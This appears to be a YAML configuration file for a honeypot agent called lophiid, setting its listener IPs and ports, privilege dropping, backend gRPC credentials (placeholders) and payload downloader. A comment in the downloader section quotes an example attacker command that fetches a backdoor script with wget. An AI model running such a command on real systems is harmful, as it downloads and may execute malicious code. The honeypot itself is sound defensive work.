general:
  # This is the IP that will be used to report to the backend. It can be
  # different to the ip in the http listeners below because of NAT. Typically
  # you want this to be the IP that attackers target.
  public_ip: 192.168.1.78
  # Drop privilegs to this user. Note that privilege dropping and chrooting is
  # optional and only done when the user and chroot_dir settings are set in this
  # configuration.
  user: lophiid-agent
  # The chroot and user options need to be used together. Adding just one has no
  # effect. Chroot to this directory.
  chroot_dir: /disk/chroot/lophiid
  # The log file can get quite big when using debug logging. Therefore put it
  # somewhere with enough space.
  log_file: /tmp/agent.log
  # the log level can be one of debug, info, warn and error.
  # https://pkg.go.dev/log/slog#Level
  log_level: debug

# Configure the HTTP listener.
http_listener:
  ip: 192.168.1.78
  # Configure as many ports as you like.
  port:
    - 8000
    - 8001
    - 8002

# Note that you need to have at least one http_listener or https_listener. You
# don't need both. If you have both though then make sure you use the same IP.
https_listener:
  ip: 192.168.1.78
  ssl_key: /path/to/http/server/ssl/key.pem
  ssl_cert: /path/to/http/server/ssl/cert.pem
  port:
    - 443
    - 981
    - 1311
    - 8243
    - 8333
    - 8443
    - 8448
    - 8843

backend_client:
  ip: 127.0.0.1
  port: 41110
  status_interval: 10s
  # The authentication token needs to be known by the backend. You can set it
  # using the UI (honeypots section) or by editing the database (not
  # recommended).
  # Note that this token MUST be exactly 64 bytes long.
  auth_token: "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
  # The backend and agents ue SSL authentication.
  # The public certificate of the CA you created to issue the backend and agent
  # SSL certificates
  grpc_ca_cert: "path/to/backend/ca/cert.pem"
  # And the client specific SSL certificate and key.
  grpc_ssl_cert: "path/to/client/ca/specific/cert.pem"
  grpc_ssl_key: "path/to/client/ca/specific/cert.pem"


downloader:
  # Payloads received by the honeypot can contain URLs to secondary stage
  # payloads. E.g. an initial payload can contain "wget
  # http://1.1.1.1/backdoor.sh" and the honeypot will try to download this.
  # Keep this timeout a bit long because some IoT machines are very slow.
  http_client_timeout: 10m

  # The entire p0f section is optional and should be avoided if you don't run
  # p0f.
p0f:
  socket_location: /tmp/p0f.sock
  send_interval: 1m
